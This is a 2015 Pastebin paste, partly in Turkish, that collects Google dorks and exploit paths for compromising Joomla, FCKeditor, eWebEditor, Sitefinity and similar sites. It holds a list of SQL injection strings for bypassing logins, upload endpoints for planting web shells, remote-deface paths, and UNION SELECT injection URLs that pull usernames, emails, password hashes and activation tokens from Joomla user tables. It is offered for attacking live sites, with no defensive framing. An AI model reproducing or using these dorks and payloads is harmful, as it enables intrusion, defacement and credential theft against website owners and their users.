Advertisement
Kyfx

Exploit Dorks for Joomla,FCK and others 2015 Old but gold

Aug 24th, 2015
3,220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. inurl:”/admin/saveannounce_upload.asp”
  2.  
  3. inurl:”admin/eWebEditor/Upload.asp”
  4.  
  5. inurl:”UploadFile/upload.asp”
  6.  
  7. WEBWİZ ACİGİ (RTE UPLOAD ACIGI )
  8.  
  9. inurl:rte/my_documents/my_files/
  10. inurl:/my_documents/my_files/
  11. exloit: /rte/RTE_popup_file_atch.asp
  12.  
  13. Editör açığı
  14.  
  15. inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
  16.  
  17. EXPLOİT : /Editor/assetmanager/assetmanager.asp
  18.  
  19. Joomla upload açıgı
  20.  
  21. inurl index.php?option=com_expose
  22.  
  23. Exploit: administrator/components/com_expose/uploadimg.php
  24. Uploadin gittigi yer : /components/com_expose/expose/img/
  25.  
  26. Sitefinity: Login upload açıgı
  27.  
  28. inurl:”Sitefinity: Login”
  29. exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
  30.  
  31.  
  32.  
  33.  
  34. Auto Login For Joomla Dork .:old:.
  35. inurl:/administrator/index.php?autologin=1
  36.  
  37.  
  38.  
  39. ---
  40. BYPASS ADMIN ACCESS
  41.  
  42. Dorks:
  43. Code:
  44. inurl:admin.asp
  45. inurl:adminlogin.aspx
  46. inurl:admin/index.php
  47. inurl:administrator.php
  48. inurl:administrator.asp
  49. inurl:login.asp
  50. inurl:login.aspx
  51. inurl:login.php
  52. inurl:admin/index.php
  53. inurl:adminlogin.aspx
  54.  
  55. Code:
  56. ‘ or 1=1 –
  57. 1'or’1'=’1
  58. admin’–
  59. ” or 0=0 –
  60. or 0=0 –
  61. ‘ or 0=0 #
  62. ” or 0=0 #
  63. or 0=0 #
  64. ‘ or ‘x’='x
  65. ” or “x”=”x
  66. ‘) or (‘x’='x
  67. ‘ or 1=1–
  68. ” or 1=1–
  69. or 1=1–
  70. ‘ or a=a–
  71. ” or “a”=”a
  72. ‘) or (‘a’='a
  73. “) or (“a”=”a
  74. hi” or “a”=”a
  75. hi” or 1=1 –
  76. hi’ or 1=1 –
  77. hi’ or ‘a’='a
  78. hi’) or (‘a’='a
  79.  
  80. ----
  81. Joomla Component com_smartformer shell upload
  82.  
  83. Google Dork inurl:"index.php?option=com_smartformer"
  84. & upload shell.php
  85.  
  86. Your shell :
  87. http://localhost/components/com_smartformer/files/yourshell.php
  88.  
  89. ---
  90. Ministry Web Designing Multiple Vulnerabilities
  91. exploit bypass to login:
  92. user: '=' 'or'
  93. pass: '=' 'or'
  94.  
  95. Vunlerable Sections:
  96.  
  97. inurl:/downloadcounter/admin/login.php
  98. inurl:/mediaprogram/admin/index.php
  99. inurl:/churchprogram/login.php
  100. ----
  101. (Deface)Exploit (Remote Deface ) Joomla Component
  102. Dork : inurl:index.php?option=com_fabrik
  103. Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  104. ---
  105. [Priv8] Joomla Com_content exploit - defacing joomla websites
  106.  
  107. Dork :
  108. inurl:index.php?option=com_content & "/mambots/editors/fckeditor"
  109.  
  110. Vulnerable File :
  111. mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  112.  
  113. You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell
  114. ----
  115. exploit joomla "com_artforms" reset password
  116.  
  117.  
  118. Dork : inurl:"option com_artforms"
  119.  
  120. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
  121.  
  122. /index.php?option=com_user&view=reset
  123.  
  124. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement